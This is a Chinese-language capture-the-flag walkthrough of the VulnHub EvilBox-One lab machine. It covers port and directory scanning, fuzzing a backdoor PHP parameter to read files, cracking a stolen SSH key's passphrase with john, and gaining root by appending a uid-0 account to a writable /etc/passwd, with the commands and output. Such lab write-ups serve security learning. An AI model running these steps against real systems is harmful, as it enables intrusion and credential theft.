靶机地址:https://download.vulnhub.com/evilbox/EvilBox---One.ova
准备工作
可以先安装 kali 的字典:
sudo apt install seclists
或者直接输入 seclists
,系统会问你是否安装,输入 y 即可自动安装
默认路径就是在 /usr/share/wordlists
里面各类的字典非常多
gobuster
的安装同理
信息收集
nmap 探测端口开放信息
┌──(kali㉿kali)-[~/Desktop/Tools/fscan]
└─$ sudo nmap --min-rate 10000 -p- 192.168.142.129
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 11:12 CST
Nmap scan report for 192.168.142.129
Host is up (0.00052s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:B5:81:B9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.20 seconds
nmap 探测开放端口的详细信息以及操作系统等信息
┌──(kali㉿kali)-[~/Desktop/Tools/fscan]
└─$ sudo nmap -sV -sT -O -p 22,80 192.168.142.129
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 11:12 CST
Nmap scan report for 192.168.142.129
Host is up (0.00022s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
MAC Address: 00:0C:29:B5:81:B9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.78 seconds
fscan 扫描
┌──(kali㉿kali)-[~/Desktop/Tools/fscan]
└─$ ./fscan_amd64 -h 192.168.142.129
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.142.129 is alive
[*] Icmp alive hosts len is: 1
192.168.142.129:22 open
192.168.142.129:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle: http://192.168.142.129 code:200 len:10701 title:Apache2 Debian Default Page: It works
只有一个 80 是可利用的,所以就直接访问扫目录了
┌──(kali㉿kali)-[/usr/share/wordlists/dirbuster]
└─$ gobuster dir -u http://192.168.142.129/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,asp,jsp,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.142.129/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,asp,jsp,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 280]
/.html (Status: 403) [Size: 280]
/index.html (Status: 200) [Size: 10701]
/robots.txt (Status: 200) [Size: 12]
/secret (Status: 301) [Size: 319] [--> http://192.168.142.129/secret/]
/.php (Status: 403) [Size: 280]
/.html (Status: 403) [Size: 280]
/server-status (Status: 403) [Size: 280]
Progress: 1323360 / 1323366 (100.00%)
===============================================================
Finished
===============================================================
扫出来三个
/index.html (Status: 200) [Size: 10701]
/robots.txt (Status: 200) [Size: 12]
/secret (Status: 301) [Size: 319] [--> http://192.168.142.129/secret/]
index.html 是默认页面
robots.txt 的内容:
可以先记录,万一是后面需要用到的用户名或者密码
接下来就是二层目录爆破/secret 了
扫出一个 evil.php,像是后门文件,没有回显,需要爆破参数
还得猜一下后门类型(eval,system,include)
eval 参数爆破
无结果
system 参数爆破
无结果
include 参数爆破
成功爆破出 command
任意文件读取思路:
1.可以读取/etc/passwd或者知道用户名的前提下,可以看用户目录的历史命令
2.可以看一下/root/.ssh/id_rsa或者/home/user/.ssh/id_rsa查看私钥 公钥文件`authorized_keys`
3.使用php伪协议写文件:
* 写文件:php://filter/write.base64-decode/resource=文件名&txt=写入内容的base64编码
* 如果写入成功的话可以直接查看,否则不成功
4日志包含getshell.
5.filterchains php gen
使用如下命令查看 ssh 登录的相关信息:
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh mowree@192.168.142.129 -v
发现允许公钥和密码登入,发现只有第二种方法是行得通的
ssh 中密钥和公钥的配置文件路径:
公钥: .ssh/authorized_keys
私钥: .ssh/id_rsa
这里有两种思路去读取:
1.读取 root 的,直接抵达目的(大多情况下权限不够)
2.直接读取用户的配置文件,一般下权限都是足够的
这里只能读取用户的,私钥:
公钥:
写入自己的 ssh 文件,然后
但是这里无法直接拿着密钥去登录 ssh 还是需要密码,有两种可能:
1.服务器未开启私钥登录的配置
2.在设置私钥的时候配置了私钥的密码(passphrase)所以在登录的时候还是需要输入密码
getshell
所以下一步就是需要爆破设置的密钥是配置了什么密码,利用 kali 自带的 john 工具
但是这个工具对爆破的内容格式要求比较严格,我们需要使用脚本把格式弄成我们需要的格式,脚本文件位置:/usr/share/john/ssh2john.py
利用此脚本:
python ssh2john.py /root/.ssh/id_rsa > /root/.ssh/hash
然后就可以利用 john 爆破了
密码就是 unicorn
这里登录之前记得赋予 id_rsa 以 600 的权限
chmod 600 id_rsa
使用私钥登入即可
权限提升
suid 提权:
mowree@EvilBoxOne:/tmp$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/su
无可利用的 suid
找内核漏洞:
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/linux/local/cve_2022_0995_watch_queue Yes The target appears to be vulnerable.
2 exploit/linux/local/su_login Yes The target appears to be vulnerable.
3 exploit/linux/local/vmwgfx_fd_priv_esc Yes The target appears to be vulnerable. vmwgfx installed
三个可能可以利用的,但是没有一个打的通的
查找可写的文件
find / writable 2>/dev/null | grep -v run | grep -v proc | grep -v sys | grep -v var | grep -v usr | grep -v /dev | grep -v apache2 | grep -v ssl
发现/etc/passwd 文件可写,利用写入新账户提权
mowree@EvilBoxOne:/tmp$ echo 'root2:$1$u1UR7D3z$Zp7IvFndtV5XH/tYozXi6.:0:0:root:/root:/bin/sh' >> /etc/passwd
mowree@EvilBoxOne:/tmp$ su root2
Contraseña:
id
su: Fallo de autenticación
mowree@EvilBoxOne:/tmp$ id
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
mowree@EvilBoxOne:/tmp$ su root2
Contraseña:
# id
uid=0(root) gid=0(root) grupos=0(root)
欢迎来到这里!
我们正在构建一个小众社区,大家在这里相互信任,以平等 • 自由 • 奔放的价值观进行分享交流。最终,希望大家能够找到与自己志同道合的伙伴,共同成长。
注册 关于